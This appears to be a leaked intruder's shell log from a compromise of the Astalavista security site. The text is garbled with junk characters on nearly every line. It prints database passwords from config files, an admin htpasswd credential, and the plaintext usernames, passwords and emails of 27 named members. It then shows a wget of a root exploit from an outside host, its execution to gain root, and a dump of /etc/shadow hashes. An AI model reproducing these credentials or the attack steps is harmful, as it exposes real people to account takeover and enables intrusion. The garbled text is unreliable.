! ~2 Y' T7 G+ E2 Q6 \7 bdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0072 l% ]& t& B# n3 U5 M0 y& U1 Y
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql+ u. p0 r4 T$ W2 J
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
T( c' m# x7 |" f6 }drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend& D' J! P6 |; \, i
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
' I% V2 n# w0 _5 P) N! j# t$ }-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
H0 L) X* R& C/ {. P! Mdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config& a, Q$ l' ~* q# d8 [# P$ b% L# p
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
, t) Q9 c$ t# ^" l- O7 i" J: [drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
! F/ B$ l% y m5 A2 }-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php1 f5 A. W1 @* d9 Q! I; I
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
; \1 W2 s1 |8 H" \; c' udrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
; I- l0 ]4 d; Tdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
# B, P* F& U4 G% y" S# l4 i-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess+ ]' e! P a0 T' t5 F7 O
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess% X0 b& k- y" Q
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
6 [+ L& T3 Y0 @0 U8 C-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html' Y* c) q1 c( e# d# F( z
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
6 t/ O1 h; |7 N7 K-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php( r1 ^6 j- G7 u6 [
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf2 I w( N. D b/ @% N
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
6 r3 t& @: [" b5 D: }+ Jdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
0 B. u" B7 t2 V, |" Q. b3 v, T, Odrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib: ]6 F y4 Y* v' Z: d2 O. V6 W) `
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log: X/ m" w9 L3 a' r: ~
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member) S) j: g' k/ T2 {( m5 r0 \
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata3 ~. v4 H: Y+ P% y0 b( ]
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
3 f6 a. {4 x& a! l! d-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
& v2 o+ k4 A/ k: c2 N5 \drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re% L$ _5 |% o' ?. O' _1 E2 o
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
4 c# G$ B% }% K( hdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
* N! \5 ?& L) @, d1 [) wdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
3 L0 g& O' p/ U. f. K6 {drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
+ e4 l- u, `. }4 @5 y8 c# qdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes' C, `- \8 `: I2 [4 M
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
8 l; Z7 ^9 Z- V4 r2 j2 zdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl$ C# J# b* R) j* X( ^
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2: [# ]: n9 Q1 t# h* J1 r
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
# y2 Y, T) o* n u8 ^-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
; D, f5 k! G5 q; Hdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
6 C7 k! ?' D3 q# B1 e/ R) [
% B+ J$ d6 s8 r+ A) Xsh-3.2$ head -20 index.php/ \" ?3 A4 v K) P
<?PHP
* r. t; A! L1 C/**+ D; e5 N" w& J+ W8 }
* Mainfile (external) for astalavistaNET v2.0' p& C; V6 U! ?" K
*( B7 U3 N: \5 C! u( w0 ~
* @copyright Astalavista IT Engineering GmbH$ ~$ `. o& e3 H7 T% C
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>) _1 q2 g" _2 t) u
* @version 1.0
( e& L% l+ z3 H*/ l/ F1 ^( u9 i$ g1 |% k. I
' a) J) S& u1 I( [2 P
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
: f; o0 U; b" n $dontStartSession = false;
8 z3 B A! m1 f: s* x- ^ } else {
+ S0 H# K O [& y $dontStartSession = true;
5 W$ f' e- a9 D+ \5 W' X }
3 q" Z4 V8 L9 P* q3 I& c. ` require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
5 | v- T) g9 @1 J) G$ z/ l) C M3 o; t require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’); O6 B1 \' c7 S) h/ d2 L6 |& ~
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
' ?" I- g2 V5 ~6 @0 H8 Z$ K7 y( q require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
7 m9 ^) a4 w2 l
! ?7 q. O) L1 w( g: O) x4 g2 S( \sh-3.2$ cd config
8 {; `# n8 i6 L7 i# u% vsh-3.2$ ls -la# a' T/ k* h4 p
total 32
6 O! m- p9 b0 _( R, Adrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
) w }3 o9 _5 E0 |( g! |drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 ~* m$ D+ y# l9 s+ Z
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
! `% M$ {' x+ R6 x' B1 \8 o1 V-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
% o1 Q$ P3 w, [: H-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php" j8 @4 d o6 C8 x, M
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
4 l/ A) N: A& t* L& P-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
; }; {: O+ K7 t: J
# ^6 n* k' i& R/ `, B( Nsh-3.2$ cat com.conf.php
# o1 j t! U( p8 j[snip]
% S. K) ^( S2 p//member-database
: W1 J. A! F8 `: p s8 f" _$_CONFIG['db_mem_server'] = ‘localhost’; G* {6 Z- i8 B8 c
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
/ C3 M) w& f% G$_CONFIG['db_mem_user'] = ‘astanet_db’;: P) I" M+ @1 x' E# \( N. G. a
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;' F0 P& Q+ E5 g
$_CONFIG['db_mem_debug'] = false; //true or false* H3 B+ F) z8 O
//ads-database1 q4 D8 {$ }% F) _ t0 }( k
$_CONFIG['db_ads_server'] = ‘localhost’;& d9 Z& f0 `6 q- Z( t
$_CONFIG['db_ads_database'] = ‘astanet_ads’;4 @7 @& Y2 h0 [& e; S; {
$_CONFIG['db_ads_user'] = ‘astanet_db’;% C F; e. V" Q8 I/ p D( R
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;; |! w- [5 G8 Z3 i1 i
$_CONFIG['db_ads_debug'] = false; //true or false
* E6 e) r- r& {2 A- F# e//rainbow-database
0 {5 n! ~/ U" V! a* b$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
; s/ w. I% L. s8 p& f& t8 x$_CONFIG['db_rainbow_database'] = ‘rainbow’;; u1 W7 m& F: e( R
$_CONFIG['db_rainbow_user'] = ‘dinu’;
4 F! p/ @( X: J: F2 t. d$_CONFIG['db_rainbow_password'] = ‘dinudinu’;% Z1 w) p- H, Y2 V
$_CONFIG['db_rainbow_debug'] = false; //true or false# k# h" z6 H* H3 S9 j/ s
//mailing lists database
1 t0 _5 | A" {% l$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
* p. S+ V$ E5 j$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
- j9 y7 [8 x7 q" A! r" z. F. N, c/ j. ?$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
# ~7 t9 c* e) A6 \4 k' e9 F) G+ I$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;8 j' H) J( a2 A+ g; g6 W* {
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
) n+ ^) y+ i5 X: [: }+ v//paypal
0 ~) ^2 n; t% ~9 S1 x$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;0 ?, n2 Z: U3 h6 x6 u
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
9 @8 b1 `# ?* H v& o3 B/ R* `$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;( a7 L2 E5 ]2 c" e& _. q* n
$_CONFIG['sub_pp_noship'] = ‘1′;
* S' { q$ E! g" ^6 O' ]; P2 ]! B$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
) W- R0 h i2 M ^; [. S[snip]! W3 `1 w2 t/ |9 W) W
& `& f7 m& l& W9 k' _7 k
sh-3.2$ cd ..
. p U( h/ V" t9 n' Z( G: c( dsh-3.2$ cd member
2 S D7 L1 F9 wsh-3.2$ ls -la7 H% m/ h9 i. N. K o/ T1 Z
total 20
% W& a% R* C) @; Udrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
1 f( o- o9 u7 ~6 Gdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..! W( T* e! I; Z: h# {0 |
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
+ A( }/ y) R- `; `0 Y; j-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
( Q7 E6 ~& v$ F6 L5 `( X9 N4 Dsh-3.2$ cat .htaccess
- b1 }8 ^- E0 {SecFilterEngine off
% ?5 V6 k3 @; D$ v8 J3 w" x
0 x P0 q- Z3 Xsh-3.2$ cd ..5 n: R; a+ U" P+ B' j
sh-3.2$ cd cron
4 G7 k4 |- [) L6 N. N3 j2 t; Nsh-3.2$ ls -la
7 s ^% B7 t0 d8 qtotal 168
. g7 M- U/ F. P% c3 Qdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .' U. u" Z" T7 t ]4 \
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 \# H3 D2 E G6 h6 Z5 d9 | t4 ]
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
$ @+ [+ ~1 ]# T: a! c0 T6 p-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
; a2 J4 K: I; P; J$ a$ g7 I-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php* e4 a! y3 m v% U
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
5 z+ i- d$ D7 y& _-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php% T, B$ m d+ d3 p" g% n* L
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php+ C$ d, v8 o& t
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
# G$ S( f; V" ^3 [2 z$ d6 g-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php+ \4 _- R w6 a/ {6 J
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
0 f5 c% q% E/ @-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php7 i: j2 a' g3 `0 A5 R
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php2 `! F8 l3 |( n' h. u7 n
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
9 g0 O V \1 k& U- ^-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh( G) p: z2 L% X
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
. r/ `: j8 |, x- y) O1 G" i/ {9 a-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php% J' ]1 t. X$ o4 {/ D/ s
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
+ V# U/ g# d8 X7 H-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php' s- c/ @6 s+ K% I% R% \+ r
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
% F2 m3 D. }; Xdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email; M; `4 F( d& g0 f& |/ R
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php% ?; |- Y9 I' K$ C& l
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
$ l+ J' {) j. B0 z0 M9 [2 k) U3 A
) X8 C$ E; y' \" Psh-3.2$ cd ..* h2 w9 `4 g5 j( s5 K0 s/ d$ X; M
sh-3.2$ cd _0077 H3 P7 w# U/ D9 Z$ g# t
sh-3.2$ ls -la. Q( P% D. t) H0 U i n
total 241 h: I1 H1 y! M
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
* ~; e1 J% P# F7 q% u& \ vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
! i: \9 K# o' W: s% G-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
2 {, o2 k; s7 \+ N* K-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
1 D @: e; j- _& F7 ~9 j) M6 r-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
; e) }7 y. A7 N: pdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap X# Q" S. y F
$ _/ I, [8 z- z; M& ^# E9 P0 vsh-3.2$ cat .htaccess' ~3 J6 E; s' \( y! ?
authType Basic: J* J; S% ?) q
authName Admin
5 |: P' d4 ?8 R( v5 rauthUserFile /home/astanet/auth/.htadm_pwd
- J5 p. c. H+ e1 ~; Zrequire valid-user
+ Y2 i! b9 T& M7 ~
! L; d9 }/ @& psh-3.2$ cat /home/astanet/auth/.htadm_pwd, P8 f/ n5 G" l7 Y
admin2net:CR0bl65MwhfT% e) G2 v" y! {9 |
1 B. J) y/ o- o# `0 e& J
sh-3.2$ mysql -u astanet_db -p
+ ^* l: ?( f: g1 f/ F8 w& M) @Enter password:
$ W+ \/ n$ c4 l4 G- @' G7 ]Welcome to the MySQL monitor. Commands end with ; or \g.
- x$ I2 R- L: mYour MySQL connection id is 275153& J4 T m5 z1 o! y, c5 ^* j* S% j
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 R1 N, ]- J0 H$ [9 A0 X# F4 W
- X) C6 \6 A6 Y+ o/ j2 T# T
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. f9 d9 ` k1 D7 k8 [2 K) h
0 d" l X: |; r2 X$ g1 [ qmysql> show databases;4 w( U3 [* N0 q3 J! W0 P
+———————–++ D- A: X q4 D) H7 q
| Database |1 ~6 @! o1 H$ [" c, E4 V
+———————–+
) o. {/ L% t) P: H% H& m| information_schema |
+ X9 Q) L) k+ Y| astanet_ads |3 F, m7 d$ A. Y% e, M) }' E
| astanet_mailing_lists |
0 V+ o& F( C: @. E) h" W) ]1 b. K| astanet_mediawiki |
* j* N I: C+ J$ w/ V| astanet_membersystem |
5 k: m0 \; V x7 p! n! z- z| test |/ ~+ m0 R0 W; i6 b! H+ p8 u
+———————–+( g4 _0 H j3 k. D
6 rows in set (0.00 sec)
: z7 l8 y" B4 s2 ~$ C5 o2 [$ |# H/ ^1 ?" L0 U
mysql> use astanet_membersystem4 I5 F x% n, I# K1 n B3 p7 X
Database changed4 A: V( C9 J) [9 e) w2 K6 S
mysql> show tables;5 s% _3 Q/ g: n/ A
+———————————–+0 }$ b4 g9 N# s4 H2 L8 h' w. c3 q0 a
| Tables_in_astanet_membersystem |7 v2 a- E J) F/ L
+———————————–+) `: `! [# G8 w8 l ^
| blacklist_categories |
' c# q7 J. }+ a+ ?( C/ B- i| blacklist_content |) _! Q% y4 g' a" p) L0 ?9 O
| blacklist_levels |( |3 l, X: o3 j" K& h
| blacklist_mcset |
% H) H6 L* Y! N) Z| dir_categories |
3 V" B4 W/ O! B/ [( y9 B' ^& y| dir_comments |
" Q& {& a: |6 m4 L+ h1 R| dir_links |
0 ?" Q8 b2 X; P3 ]9 ? J| dir_temp |6 d* Y4 s# D6 I% g! J' |
| dir_votes |5 A& C2 K) E& D; G6 t
| documents |, g- G$ g; A, P- H
| documents_categories |# L, _; K& X( X, w; K
| email_content |, ]& x% y1 u1 o& B: R9 i
| email_settings |
D# m7 O3 Y/ P7 D2 D- v| exploits |
0 {) y! q' [- G4 A| exploits_categories |/ l9 B; }4 P! `# a5 v7 A
| exploittree_categories |
4 o% Y; c! c: e1 P# G& N1 R; P| exploittree_exploits |0 ?$ Q$ J- ]9 J7 m9 ]- X
| home_values |
& z& b& s8 j% l! \! F$ V| iso_countries |
$ g3 w6 W( H* I: f, y0 F& H. ~| links_categories |- ^$ w$ p1 E- }$ W4 }& ^
| links_records |
% c3 h; M7 w5 d& I| links_unauth |# t: U1 M1 h( ^3 m/ x; Z' w, Q4 m
| links_votes |
0 C+ x$ C/ b& u3 D; ]! T| log |
6 F9 Z: C. I/ y2 ]; u) q& s| news_categories |6 O& {' i# A1 _8 b& Z$ [
| news_comments |) I3 j) L& H* v( y
| news_emoticons |8 ]+ R4 _0 \" r
| news_latest |
, G; t% P/ N6 ]9 L& J+ a| news_messages |
6 ?- h% J7 v8 a5 m7 L+ ]| news_statistics |3 Y% L; \! ^; }7 a4 u T' _! E
| news_votes |
4 B! w" v7 K- E! T9 k| prices_content | _8 p1 G; o, D1 n% K
| prices_offers |7 \' R% A1 k) c K
| rss_settings |) ~- U- ^2 z2 \* S
| sessions |' F l8 p" O6 S7 n, X
| stats_signups |2 g6 G( h: ?' X; i; M; K* N
| u2u2 |2 ]' e. b; f% Q; \" D1 u6 j
| u2u_contact |
; \4 p* x4 X7 n/ p: K7 O1 v| u2u_settings |
# A F- l, M3 }! y3 Z( n| user_keywords_selected_categories |
0 Z" i2 F$ @5 ?! v- z: I. o5 |4 Z| users |
- ^, z# B* N# n6 C| users_ipn_test |' R& P$ n( f0 ~1 J+ Y
| users_keyword_values |
+ s3 T" i2 d6 r3 R, v" c& ~| users_profile |
0 W: U8 r" v' J& V| users_temp |
" z( t8 G) T" `| users_upgrade |
# K$ Q5 e( J, l+———————————–+! f- N/ F/ W8 {( ^& n1 v
46 rows in set (0.00 sec)
* G3 b3 N( e* _4 W' V0 P7 L
" n& ]9 V& N9 Q: _6 T/ Mmysql> describe users;
4 C8 W) n) ?4 h6 Z0 F+————————–+————————————–+——+—–+———————+—————-+
, ^" J0 i/ H) n: n) ?: \/ i| Field | Type | Null | Key | Default | Extra |* W# h6 ?! u/ H2 p/ A5 x+ v3 R
+————————–+————————————–+——+—–+———————+—————-+
; c" |* P8 H2 F) m4 t% D3 @6 `| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
- r3 t7 L4 u. o% f1 ^: T9 d| user | varchar(50) | NO | | | |
3 [6 w& f, V I2 W| nickname | varchar(30) | NO | MUL | anonymous | |
7 e1 f. G ~3 k5 D8 Z' @| password | varchar(30) | NO | | | |, ?9 r; }# i5 _# M; I4 o$ e- d
| userlevel | tinyint(3) | YES | MUL | NULL | |
9 _: K6 @; S& y. H! k& s' @| exp | int(8) unsigned | NO | | 0 | |
# N. M! N/ r D1 L o% z| email | varchar(50) | NO | | | |
, o* H' @; ~( ~4 W. x4 b| ip | varchar(15) | NO | | 0 | | G. o D3 q( D% S
| proxy | set(’0′,’1′) | NO | | 0 | |
" Z1 n7 ^( z P; e3 b$ r+ l| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
3 ~8 @1 H: P) ?7 |6 V| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |$ [. C# x! g# n g9 T
| anz_in | tinyint(1) | NO | | -1 | |' m- m- Y( c Y$ k9 b
| status | tinyint(1) unsigned | NO | | 0 | |* x* O1 D: |* z5 i8 Q) N6 I" |# m
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
- ~% q2 |% h: V; B; R| freemember | set(’0′,’1′) | NO | | 0 | |
3 S2 ]5 Z& H$ D) u: P/ C5 f5 B* C| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
$ s# [; q. Q! w| lang | tinytext | NO | | | |
+ k* s* W, U! l || adid | smallint(6) | NO | | 0 | |
; u9 Q: g# j5 Q. z) ^| pp_txn_id | varchar(255) | YES | | NULL | |
1 ^; z+ ~8 ^2 R0 N| cnb_transaction_id | varchar(255) | YES | | NULL | |* G2 Y& j1 J. K; y
| cnb_order_id | varchar(255) | YES | | NULL | |
$ P" Y1 |$ d. x$ U( `7 |$ Z| cnb_user_id | int(11) | YES | | 0 | |
' J- h7 _; I6 i# l+ Z+————————–+————————————–+——+—–+———————+—————-+
8 E, B( Q4 \. e+ k& A22 rows in set (0.01 sec)
& o* K" s8 r6 c5 H5 m7 l
V f' C' l& G+ ]( i3 nmysql> select count(*) as skids from users;/ @2 o/ K$ G: M* M* W1 W4 M6 W
+——-+
, N( L' Z- V9 {+ l( x5 [ J| skids |
: r) [4 t$ U( g, V1 ^ {+——-+
. @1 g- B( H" U1 T| 25199 |
, r* S. B. n L1 F9 L$ i+——-+
: {; j. ~# W1 H" L! P1 row in set (0.00 sec)$ g/ Z/ b; ~3 P
8 k0 o' E# ~$ T' r4 E
mysql> select user,nickname,password,email from users where userlevel = 1;; {5 |+ o" I; y9 a H7 S
+————————–+———————-+——————+———————————–+
* p- X, e2 M. C: X q| user | nickname | password | email |
- [5 O, n! Q/ a* o: N- U* ~+————————–+———————-+——————+———————————–+
# S4 |, U3 l9 {# N/ E; t8 o* @9 d" q| pascal | prozac | astaman3 | 链接标记info@astalavista.net |4 @- M# b& w4 M T$ e
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
; W; I3 s4 Z1 I# J1 C2 @| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |7 q% w0 z+ H" o! v8 Q" n
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
! g0 F* z' m- r% P- l| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |; F# X% y& c% G+ a
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |( u) A; s9 n# [2 O7 r' P; Y& D0 P
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
2 L( |1 N* \9 Z! l4 [) ?& K* }. x| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
* H& ~+ u- W: k' H| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |0 v Q ?/ f' ~ Q, R4 T5 X; G
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
5 d& s; r8 t% M% t `4 c3 W, K| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |% i6 N' O! H1 |- D1 v- U
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |0 B& Z; J4 F8 l& a. h
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |% u+ z2 Q7 j) V4 C9 z
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
2 P: j! c! `& x) j4 y0 U' A) d| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |( I, F" r5 \0 F/ Q& O: p: u
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
' W( P: ^3 f, r6 w) `# {+ [| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
4 y1 k \/ @3 E$ s$ H: o: b% i| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com | j m ^, Z) v" _4 e+ L
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |# g8 p* {6 _* o4 G: J
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |3 q' V! X+ J4 w* f4 r
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
) {3 f6 ]# c" R1 t| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |5 g) R2 t H! s, J a8 A
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |0 g, L# n6 M8 G4 _2 Z$ }" \! J/ G- x
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |+ h6 L3 l: E* L: x! e' P
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |* e/ P& u; ~& W$ l7 R- {& n
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
. E, a1 r) m- t0 _6 O| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
$ j6 D U4 t* p9 i+————————–+———————-+——————+———————————–+! m9 l2 x e( B) s1 U" J
27 rows in set (0.00 sec)9 l+ |( i+ R; G7 h
- o5 P& r" ?6 C& j, X7 I( c2 C
mysql> exit;% R: {( \; [) u$ Y) I
Bye
2 ]5 i: q- b( p4 b9 }& q6 i
& h& O& ?8 ^# ^$ W5 |4 M[~] plaintext passwords? yes,1 L3 p2 j4 t# E8 {# W6 \ ~. g
Those so called “security professionals” who charge you $6.66 / month to
( @' x/ d' u* K5 I; b. P% Pregister at their hack-proof portal, save your passwords in plaintext…; B' A6 m4 t7 a- W l& R( }1 Q
brilliant!+ w& ^& {( x" Y: d- D
4 z# G) o9 o. O3 X7 _[~] This been fun but we want more.
8 d$ }( R* W- F: }+ z4 I/ v+ i: C" A: r" c3 R3 q
sh-3.2$ uname -a
- n! X* X7 U) @Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux2 ?" [- h- R6 l8 _+ ^
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]6 G7 ]- j8 N) U Z1 `' Z
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
$ Z9 i$ y% v9 @" nResolving anti.sec.labs… 13.33.33.37% Z1 B2 _- n+ t- N9 m4 t: ^9 `9 z
Connecting to anti.sec.labs|13.33.33.37|:80… connected.3 t3 |6 U4 y( {. k
HTTP request sent, awaiting response… 200 OK; k6 r1 X5 h h/ F; U( ]! U
Length: 18200 (18K) [text/plain]9 z- ^* F, }7 }/ _* A, C
Saving to: `g0troot’& M1 _6 d( J" t7 ~
5 j8 a; I1 n* v: Z5 S5 Z$ ~
100%[=========================================================================================================================================>] 18,200 58.6K/s in+ f6 k% |, J3 E4 L) I) s4 f
0.3s4 N% N$ I3 i( H! D/ _0 _
% X r% B+ d# l* v' T18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]' n! P' I$ D9 T9 F5 C
' n2 X& M l$ e9 T/ M6 D
sh-3.2$ ./g0troot -i x86_64& X3 c. N( ]5 I" \5 `* l4 W3 h
[+] g0troot - anti.sec.labs& `; t0 i/ f* c8 g& m
[+] Target: 2.6.18-128.1.10.el5) X! z& E+ {5 C" K( z) \) K" J
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]% p2 h1 H0 M$ [5 g' v4 c6 @, n7 j
+ _. X9 M( B' t! C' ~
[+] r00tr00t
$ ?% y# O* f" E, d' v[~] Executing shell…
+ k8 b. j2 N& A5 L! u! `! D/ R' C3 A& X
sh-3.2# id
% A, |9 V$ K" D v0 K; L+ y; M' auid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
6 v. i- }0 J6 H1 t4 g# Z
' k% I9 p; W# [3 @sh-3.2# cat /etc/shadow
; L, Y) t) r; {2 H' g. zroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::" i. B6 Q6 h* l! m+ L1 m
[snip]' c9 p2 E; X: n/ E- N5 Q |
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
. C, B3 t2 e6 ~: p t' L, z) N, f2 R* njon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::: q. c# u( b+ M+ z
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
6 ?. u4 O1 I3 b4 Eastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::/ w" C2 T! ?# Z: C
1 P- l, c3 G% V: V, s( O2 Q
